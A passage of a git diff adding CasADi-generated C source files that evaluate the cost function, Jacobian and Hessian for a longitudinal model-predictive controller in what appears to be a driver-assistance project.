+#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[10] = {4, 4, 0, 0, 1, 3, 3, 2, 1, 2}; + +/* long_cost_y_0_hess:(i0[3],i1,i2[6],i3[6])->(o0[4x4,3nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a10, a2, a3, a4, a5, a6, a7, a8, a9; + a0=arg[2]? arg[2][0] : 0; + a1=arg[0]? arg[0][1] : 0; + a2=10.; + a2=(a1+a2); + a3=(1./a2); + a3=(a3/a2); + a3=(a0*a3); + if (res[0]!=0) res[0][0]=a3; + a3=(a0/a2); + a4=(a3/a2); + if (res[0]!=0) res[0][1]=a4; + a5=2.0000000000000001e-01; + a6=(a1+a1); + a6=(a5*a6); + a7=arg[3]? arg[3][4] : 0; + a6=(a6+a7); + a6=(a6/a2); + a8=arg[3]? arg[3][2] : 0; + a9=arg[0]? arg[0][0] : 0; + a8=(a8-a9); + a9=casadi_sq(a1); + a10=5.; + a9=(a9/a10); + a10=(a7*a1); + a9=(a9+a10); + a10=6.; + a9=(a9+a10); + a8=(a8-a9); + a8=(a8/a2); + a9=(a8/a2); + a6=(a6+a9); + a6=(a6/a2); + a8=(a8/a2); + a8=(a8/a2); + a6=(a6+a8); + a0=(a0*a6); + a7=(a7*a4); + a0=(a0+a7); + a7=2.; + a3=(a5*a3); + a7=(a7*a3); + a1=(a1+a1); + a5=(a5*a4); + a1=(a1*a5); + a7=(a7-a1); + a0=(a0-a7); + if (res[0]!=0) res[0][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_0_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun.c new file mode 100644 index 000000000..f17893993 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun.c @@ -0,0 +1,172 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_e_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; + +/* long_cost_y_e_fun:(i0[3],i1[],i2[6])->(o0[5]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a4=(a4*a2); + a3=(a3+a4); + a4=6.; + a3=(a3+a4); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a2=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a2; + a1=arg[2]? arg[2][3] : 0; + a2=(a2-a1); + if (res[0]!=0) res[0][4]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_e_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun_jac_ut_xt.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun_jac_ut_xt.c new file mode 100644 index 000000000..402181b8c --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_fun_jac_ut_xt.c @@ -0,0 +1,193 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_e_fun_jac_ut_xt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s4[14] = {3, 5, 0, 2, 3, 4, 5, 6, 0, 1, 0, 1, 2, 2}; + +/* long_cost_y_e_fun_jac_ut_xt:(i0[3],i1[],i2[6])->(o0[5],o1[3x5,6nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a5=(a4*a2); + a3=(a3+a5); + a5=6.; + a3=(a3+a5); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a1=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a1; + a5=arg[2]? arg[2][3] : 0; + a1=(a1-a5); + if (res[0]!=0) res[0][4]=a1; + a1=(1./a3); + a1=(-a1); + if (res[1]!=0) res[1][0]=a1; + a1=2.0000000000000001e-01; + a2=(a2+a2); + a1=(a1*a2); + a1=(a1+a4); + a1=(a1/a3); + a0=(a0/a3); + a1=(a1+a0); + a1=(-a1); + if (res[1]!=0) res[1][1]=a1; + a1=1.; + if (res[1]!=0) res[1][2]=a1; + if (res[1]!=0) res[1][3]=a1; + if (res[1]!=0) res[1][4]=a1; + if (res[1]!=0) res[1][5]=a1; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_jac_ut_xt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_e_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + case 1: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_hess.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_hess.c new file mode 100644 index 000000000..e5ceea6d9 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_e_hess.c @@ -0,0 +1,199 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_e_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s3[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s4[9] = {3, 3, 0, 1, 3, 3, 1, 0, 1}; + +/* long_cost_y_e_hess:(i0[3],i1[],i2[5],i3[6])->(o0[3x3,3nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a10, a2, a3, a4, a5, a6, a7, a8, a9; + a0=arg[2]? arg[2][0] : 0; + a1=arg[0]? arg[0][1] : 0; + a2=10.; + a2=(a1+a2); + a3=(1./a2); + a3=(a3/a2); + a3=(a0*a3); + if (res[0]!=0) res[0][0]=a3; + a3=(a0/a2); + a4=(a3/a2); + if (res[0]!=0) res[0][1]=a4; + a5=2.0000000000000001e-01; + a6=(a1+a1); + a6=(a5*a6); + a7=arg[3]? arg[3][4] : 0; + a6=(a6+a7); + a6=(a6/a2); + a8=arg[3]? arg[3][2] : 0; + a9=arg[0]? arg[0][0] : 0; + a8=(a8-a9); + a9=casadi_sq(a1); + a10=5.; + a9=(a9/a10); + a10=(a7*a1); + a9=(a9+a10); + a10=6.; + a9=(a9+a10); + a8=(a8-a9); + a8=(a8/a2); + a9=(a8/a2); + a6=(a6+a9); + a6=(a6/a2); + a8=(a8/a2); + a8=(a8/a2); + a6=(a6+a8); + a0=(a0*a6); + a7=(a7*a4); + a0=(a0+a7); + a7=2.; + a3=(a5*a3); + a7=(a7*a3); + a1=(a1+a1); + a5=(a5*a4); + a1=(a1*a5); + a7=(a7-a1); + a0=(a0-a7); + if (res[0]!=0) res[0][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_e_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_e_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_e_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_e_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_e_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_e_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun.c new file mode 100644 index 000000000..7d8ac7eda --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun.c @@ -0,0 +1,172 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; + +/* long_cost_y_fun:(i0[3],i1,i2[6])->(o0[6]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a4=(a4*a2); + a3=(a3+a4); + a4=6.; + a3=(a3+a4); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a2=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a2; + a1=arg[2]? arg[2][3] : 0; + a2=(a2-a1); + if (res[0]!=0) res[0][4]=a2; + a2=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][5]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun_jac_ut_xt.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun_jac_ut_xt.c new file mode 100644 index 000000000..228abb242 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_fun_jac_ut_xt.c @@ -0,0 +1,194 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_fun_jac_ut_xt_ ## ID +#endif + 